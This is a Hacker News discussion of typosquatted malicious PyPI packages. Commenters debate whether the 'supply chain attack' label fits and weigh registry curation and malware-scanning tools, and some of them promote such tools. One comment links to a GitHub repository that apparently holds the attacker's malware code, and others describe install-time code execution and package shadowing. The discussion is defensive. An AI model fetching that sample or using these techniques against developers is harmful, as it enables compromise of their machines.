Hacker Newsnew | past | comments | ask | show | jobs | submitlogin
Supply Chain Attack Using PyPI Packages “Colorslib”, “Httpslib”, and “Libhttps” (fortinet.com)
104 points by campuscodi on Jan 15, 2023 | hide | past | favorite | 57 comments


I really dislike this dilution of “zero-day” and “supply chain attack”: these are typosquats, not package takeovers. There’s no evidence that they’re widely affecting companies or individual developers whatsoever.

In general, you can apply a “repetition” test to these sorts of 0day claims: if the attacker can create infinite “0days” using the exact same technique, it’s not an 0day.

Edit: More generally, otherwise serious security companies should be ashamed to publish dreck like this. It’s one thing to highlight a tool that automatically detects new typosquats (this would be a genuinely useful contribution to most packaging ecosystems!); it’s another thing entirely to breathlessly hype non-existent attacks. This kind of false vigilance breeds exactly the kind of complacency that it’s supposedly intended to prevent.


Yeah. I've been ranting about a similar thing in the context of jsonwebtoken to our security guy some days ago. The vulnerability pretty much goes "Well if I can inject an object with a toString() method of my choosing into your running program, then you're totally vulnerable". Yeah, if you can inject and execute code.. you have achieved RCE? Kind of the whole pickle-discussion from python.

And nontheless, the assumed precondition for the vulnerability allows you to poison the key used to verify web tokens, so if you can inject data there, very big things immediately explode, like the entire authentication of the system collapsing.

But anyway, it's going round as a 7.6 with "trivial exploitation" in "JWTs" and OIDC uses those... and now I have scared developers, and POs and customers calling and so on.

This makes it quite challenging and honestly somewhat exhausting to attempt to define a somewhat straightforward security process which doesn't cause alert fatigue very quickly.


I saw that vuln categorized as “RCE” and had the same reaction. IIRC it was prototype pollution in an npm package during json deserialization - if you are letting attackers define javascript functions in your nodejs process, you have almost certainly already lost. The details were vague at the time so I had hoped I was just missing context.


I know some folks in the security industry. There is a crazy wide gap between capable security people and services and downright frauds.

To some extent that exists everywhere but at least say a developer who is terrible and can’t ship anything gets filtered out at some point. Security land is absurd.

All the security people I know are very sensitive about it and have in many situations felt the need to / have quit a job after a fraud was hired. They’re not dogmatic about security but they do care deeply about being productive and a sense that it’s their job to provide quality advice and actions.


Yep. Seems like the last two years have really given way to spammy or fraudulent security "researchers" who are just trying to get payouts. It's been plaguing a number of projects on GitHub for a while now.


Github itself is building extensive command-test-control mechanisms, along with CI-pipelines and internal security approval lists, for the explicit purpose of billing for all of that, and requiring that opportunistically.


If it is well done, I can see how that would be popular.


Billing for what, exactly?


> I really dislike this dilution of “zero-day” and “supply chain attack”

Agree, except it's not a matter of like/dislike, it's just plain wrong.


Unfortunately, it's marketing bull. As long as they can get wider exposure by being factually incorrect, they'll be factually incorrect.

There are good technical reasons to make a distinction, like between Trojan and virus, but they don't care. They won't be ashamed, as much as they should be.


Maybe they did this just to get posted on HackerNews (:


tragically, we will get more articles in this genre, as 'security' attracts government funding, and faux security acts are enabled via budgets and megaphones.


Yep. It bums me out as a contributor to both package indices and someone working on “supply chain” tooling; there’s serious and interesting work to be done here, but it’s general work (universal codesigning, automatic typosquat restrictions in indexes) rather than this kind of lazy blogspam “exploit” whac-a-mole.


This. Moreover, such typo-squatting attacks could easily be mitigated by using a private package registry.


As far as I understand, this is just a typosquatting attack, or more like Google SEO squatting attack. There does not exist any normal Python libraries anyone would use under these names. These packages are often made as a clone from an official package, just adding a new name. There is no reason to choose a cloned package with different name over the official one.

This is business as usual for PyPi. I reported ~3 cloned malicious packages last year and they were taken down. Only very inexperienced or unlucky software developer would fall for this attack, because these packages are not part of any supply chain. Thus, I feel calling this a supply chain attack is incorrect. Maybe a watering hole attack would be more closer to the truth.


Correct. These kinds of spam typosquatted packages are a feature of life on public packaging indexes, especially ones that have flat namespaces.

It’s not ideal, but it’s very far from a reasonable use of “0day” or an attack on an actual supply chain.


You can typosquat on non-flat indices as well: org.apache.logging.log4j => org.apoche.logging.log4j, @babel/plugin-whatever => @babal/plugin-whatever, etc. I guess one argument against that is people are less likely to type the really long names by hand.

Edit: And it’s harder to land on the typo you squatted in a longer name.


https://blog.sonatype.com/malware-removed-from-maven-central

"Unlike most other open source software component ecosystems, Maven is built upon a strong namespacing concept that requires that every artifact be addressed using (minimally) a three part coordinate: Group ID : Artifact ID : Version. Group IDs follow the Java Package convention which is the reverse of a development team’s DNS. For example, all Apache Software Foundation artifacts have org.apache as the start of their Group ID. Org.apache.maven is Maven, org.apache.struts is Struts etc."


There was this instance which was a bit sneakier, by taking a package name in a default repository which shadowed a name in a more specialised repository: https://news.ycombinator.com/item?id=34313208


It's kind of amazing to me that this is still a thing.

Supply chain attacks on the client machine basically don't exist in Linux distributions. If you're downloading a Linux disto package from the distro's official repositories, it has been signed by the distribution, and a human being working for the distro has entered that package into the repository as a real (not-malware) package.

These free-for-all ecosystems where anyone can put any package into the repository, and they don't require signing, and nobody is gatekeeping even the name of the package, is just... insane. Do you want a free-for-all, or do you want curation and quality? You can't have both.

Until there are new, curated, quality public repositories, I think the bare minimum requirement for all companies should be that they must host their own package repository, and 2 people must sign off on adding a package, with details about the package's ownership, signing key, source repository, how recent the project is, how many releases they have, etc. The basic due diligence that a package maintainer normally does. Shipping anything to prod that someone just downloaded from PyPI should be a non-starter.


> Do you want a free-for-all, or do you want curation and quality?

Based on my experience, people prefer a free-for-all over distributions with outdated and/or missing packages.

I write packages for cheminformatics, which is mix of CS and chemistry. There are very few people who can curate in this field - far more than the number of producers. But there are some, like Debichem for Debian.

Debichem distributed two of my packages. One was years out of date, and despite repeated attempts to inform them about newer versions, I never heard back from them. Instead, Debian users downloaded it from PyPI.

The other was, oddly, a package that was published on my web site - not PyPI - for external feedback, before being integrated into the RDKit (a much larger package in my field). It wasn't meant for general distribution like through Debian, and only years later did I find out.

No other package distributor has picked up my work.

> I think the bare minimum requirement for all companies should be that they must host their own package repository, and 2 people must sign off on adding a package

You and I live in far different computing environments. My customers include academics and single researchers in a non-IT-savvy company. And "prod" may start and end with "works for me, that's all I care about."


The way Linux distributions typically deal with that, is you host your packages on your own repository, provide your users instructions on how to add that repository, and have them install your packages from it. That's how big vendors keep their users' packages up to date, or keep from having to maintain multiple distros' packages (ex: ship one Debian package in your own repo that works on all Debian-esque distros).

A compromise would be that new projects added to PyPI go through a vetting system, and a package maintainer's signing key gets added. Then they can push updated builds as much as they want, as long as it's signed by the maintainer. Less secure than distro-maintained packages, but it prevents typosquatting and simpler attacks on package integrity.


> That's how big vendors keep their users' packages up to date

What do small vendors, single developers, and hobbyists do?

I don't even supply wheels for Microsoft Windows since that's not worth the difficulty. I can't imagine supporting {py3.8, 3.9, 3.10, 3.11} x {deb, rpm, whatever}, and providing installation instructions for the different platforms.

For what it's worth, I do host my packages myself, and tell people to:

  python -m pip install chemfp -i https://chemfp.com/packages/
Luckily, I also have a safety net. I have an old (Python 2.7-only) distribution on PyPI. Even with the instructions, people will do "pip install chemfp" (without the "-i" index URL) and end up installing from PyPI. This then fails, so they either contact me, or read the instructions, or give up.

> A compromise would be that new projects added to PyPI go through a vetting system

Who will do that? Who will adjudicate conflicts? Who pays for their time?

As I understand it, the PyPI maintainers are already pretty busy. I also pointed out how Debichem, a volunteer vetting system for chemistry packages for Debian, aren't able to provide timely vetting.

> but it prevents typosquatting and simpler attacks on package integrity.

How would it prevent typosquatting? What prevents someone from setting up "chamfp"?


It's very commonplace to build software yourself! How else do you make changes to the software?! Trusting build tools and sandboxing build users has proven to be very very difficult to do completely. Still, what's the point of OSS if you only ever download and use prebuilt images?


That's a different thing though. Distro packages have to be approved by a human which adds a huge amount of admin overhead, delays and so on. I don't think anyone in most programming language communities wants that.

That said I don't know why there isn't more assistance to prevent typos and so on. You can automatically scan for similar packages with similar names and wildly different download counts and just ask the user "are you sure you didn't mean httplib?"


> Distro packages have to be approved by a human which adds a huge amount of admin overhead, delays and so on. I don't think anyone in most programming language communities wants that.

Yes, and distro users complain that software isn't updated fast enough. Then you give them faster updates, and it breaks, and they complain more. If malware made its way in, they'd complain much more. On balance, security is much better for everyone than bleeding edge.

> You can automatically scan for similar packages with similar names and wildly different download counts and just ask the user "are you sure you didn't mean httplib?"

When? When they've already edited their requirements.txt file, committed, pushed Git, and it's building on the CI server? You can't depend on developers to figure out if they meant httplib or httpiib or httplib (unicode character spoofing). It's too easy to quickly choose the wrong thing, and the consequences can be dire. The wrong thing should simply never make it into stable repos, period.


People never learn.


Somewhat related question, do you think there is a market for vetted/audited/curated mirrors of the major language package registries such as PyPI and NPM?

These "uncurated" package managers will always be vulnerable to someone uploading compromised builds. Would people pay for a mirror of these that contain a curated list of vetted builds? It would probably only have a small subset of the origin registry.

The vetting or auditing could be at a couple of different levels, automatic based on on "trusted" authors and signed packages, automatic code analysis, and higher level manual vatting. Customers could request packages that are on the open list be included in the curated and vetted version.

Obviously there will be some time lag between packages being uploaded to the origin before they have been vetted and places on the curated mirror. Some sort of expedited process would be needed to security releases.

/random thought for the day


> do you think there is a market for vetted/audited/curated mirrors of the major language package registries

I personally wouldn't see much value in it, but it wouldn't surprise me if there was a market for it since it would be a good way for large companies to claim they're being responsible without doing anything but spending a (relatively) small amount of money.

The reason I don't think there's a lot of value in it is because having something curated or audited by anyone that isn't an expert in the niche isn't going to super effective, is it? Maybe they can pick out obviously malicious code and there are some easy wins at the start, but I think bad actors would adapt and do a better job of obfuscating malicious code.


There is indeed a market for it; at least, Google thinks so: https://cloud.google.com/assured-open-source-software


As ever Google are unable to produce a homepage for an "enterprise" product that clearly describes what it does and how to use it.


I would love to see repo platform owners do something about new project repos, but that doesn't do anything when a developer ragequits and puts malicious code in their own repo that's been around for years.

Really, there is no good option if you want the repo platform to be accessible to new projects.


We’re building a private registry based on Packj [1] that hosts vetted artifacts. Will post more about it publicly soon.

1. https://github.com/ossillate-inc/packj flags malicious/risky packages.


> do you think there is a market for vetted/audited/curated library repositories

(Slightly fixed to make more general.)

There is a need but there will not be a market until security is taken seriously by industry.^1

[1] ETA unknown.


Anaconda python and activestate python are products in this space, I’d argue.


I don't want to speculate on exactly how the developer at CircleCI was compromised, but it wouldn't surprise me if it was something like this. They can be pretty easily targeted and it's trivial to get RCE on a developer's laptop during package install.

These are hard to detect for a few reasons:

  - Traditional endpoint protection is often disabled on developer machines
  - Developers require much more access to their machines to do their jobs
  - Installing packages in most programming languages still results in RCE at install time
  - Most solutions are aimed at protecting code once it makes it to CI and production, but developer machines are still the wild west
If you're not already operating in a world where you assume every developer laptop is compromised, you need to start. The only real protection here is requiring multi-party review for *everything*.


This is not a compromised supply chain, but fake packages.

See my earlier comment here https://news.ycombinator.com/item?id=34390100

The fake packages are not part of any supply chain and are quite easy to detect. More serious attack would be rigging an existing widely used OSS package, but this is not what the post is about and its title is somewhat misleading.


They can definitely inadvertently be part of someone's supply line. The official repository takes precedence over any locally configured repositories (say, an in-house package named libhttps).

When that package suddenly gets published onto the official repo, it may replace the intended package without the devs noticing until it's too late.

I think this is a flawed design for a package management tool but it's the tool we've got.

These packages could be random typosquats but they might also be targeted supply chain attacks against a specific company. With the CircleCI leak, the names of internal packages may just have leaked.


In pip, multiple configured indexes have equal priority with first-wins on order of configuration (if memory serves); the tiebreaker is the version, so the attacker would need to publish a higher version than the one used internally.

Either way, that’s not the attack described in the post, and is speculative to a degree that doesn’t warrant the “0day” descriptor. It’s also not actionable for companies that run entire PyPI mirrors rather than supplementary indexes, which is the norm.


Knowing the source code would make it easier.


> The official repository takes precedence over any locally configured repositories (say, an in-house package named libhttps).

Wow. I wonder how a repository manager like Nexus handles that. If there aren't any namespaces, would it suddenly go upstream and fetch something from the official repos?


I disagree here - these could be targeted and just because we haven't seen impact yet doesn't mean there wasn't any. All it takes is one download from the right person then it can be pivoted into a supply chain attack.


For one, commiting project dependencies into your SCM can go along way. Treat 3P code as your code. Not only does this help prevent supply chain attacks, but it makes you more conscious as to the stuff you’re importing. Maybe you don’t need a 10,000 line dependency for something you could have written in 15 lines of code. There’s also other benefits of not depending on external servers for your build step which can dramatically improve install time if you have a big project with many deps. Not to mention never worrying about dependency version mismatching. All the clones have the same copy of everything.

For languages with good package managers it might seem like an anti pattern (why commit node_modules?). But stuff like this is standard for C++ dev, for example.


I understand where you are coming from but comparing things to the state of third party/library usage for c++ will turn people off. It is in a really bad state which is why things get checked in.


> Developers require much more access to their machines to do their jobs

I think this is a pretty untrue view that only seems to crop up in developer-focused communities. You don't need admin rights to write software. In the case you need to interact with the system, you probably should be working inside virtual machines anyways.


There needs to be some way of automatically flagging package upgrades that might be malware.

Introducing calls to things like is system or subprocess should be a red flag.

I feel like the pledge system would be a good model here: https://medium.com/@_neerajpal/pledge-openbsds-defensive-app...


Been working on this exact thing for nearly two years at https://www.phylum.io. We identified and reported about 1.2k packages in ecosystems like npm, pypi and others last year. GitHub app that checks your PRs for malware. We also built a free open source sandbox for package installations [1] so if malware does get executed it’s done in a locked down environment. Happy to chat further about this sort of thing, it’s something I’m wildly interested in!

[1] https://github.com/phylum-dev/birdcage


I've been building Packj [1] to address exactly this problem. You can _audit_ as well as _sandbox_ installation of PyPI/NPM/Rubygems packages and flags hidden malware or "risky” code behavior such as spawning of shell, use of SSH keys, and mismatch of GitHub code vs packaged code (provenance).

1. https://github.com/ossillate-inc/packj flags malicious/risky packages.


Vendors like Sonatype already offer this for enterprises. I feel we're a long way from it being available in core OSS repositories though.

https://help.sonatype.com/fw/best-practices/release-integrit...


This is exactly what we provide at Socket. See https://socket.dev

We flag anything a package introduces new install scripts, network, etc.


We’ve (https://www.phylum.io) been tracking this actor as well. There are more packages than this blog post notes, including: fredli, derkpy, and fredmi. The first packages from this actor appeared on Jan 1.

A bit of work has been done to RE the binary itself, and we’ve found references to the following GitHub https://github.com/T4hg/frek/blob/master/__init__.py

Happy to chat with anyone that’s interested in this sort of thing. We’ve got a trove of samples that seems to grow daily!


Why are the repos still there, two weeks later?


We report them when we find them (to Github, PyPI, NPM, etc). Unfortunately the process on the other side isn't super quick. For example, we reported some malware to NPM on Dec 31, 2022 and received an email from them stating they were starting their investigation on Jan 9, 2023. The people responsible for removal are simply inundated with malware reports.

For GitHub, they just seem to be a bit more careful in what they remove. Malware (and other security related code) _can_ be used for educational purposes. As such, they aren't as quick to nuke this stuff from the site.

See their acceptable use policy:

> Note that GitHub allows dual-use content and supports the posting of content that is used for research into vulnerabilities, malware, or exploits, as the publication and distribution of such content has educational value and provides a net benefit to the security community. We assume positive intention and use of these projects to promote and drive improvements across the ecosystem.

https://docs.github.com/en/site-policy/acceptable-use-polici...

Even when they do act, it can be slow, unfortunately.


STOP AUTOMATICALLY DOWNLOADING CODE FROM THE INTERNET AND INCLUDING IT IN YOUR PRODUCT AS PART OF YOUR BUILD CHAIN why do I need to say this out loud?


Because for most people that's a stupid thing to say.

Supply chain attacks are very rare still (especially ones that aren't just typo squatting), and auditing all dependencies (which is I assume what you meant) is ridiculously time consuming and unreliable.

This small problem can 90% be solved through tool support, automated scanning and library sandboxing (which admittedly is not really supported by any languages yet - at least not without a lot of hoop jumping).


These packages are not part of any build chain. Please see my earlier comment here

https://news.ycombinator.com/item?id=34390100


Well all it takes is a typo in requirements.txt?




Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: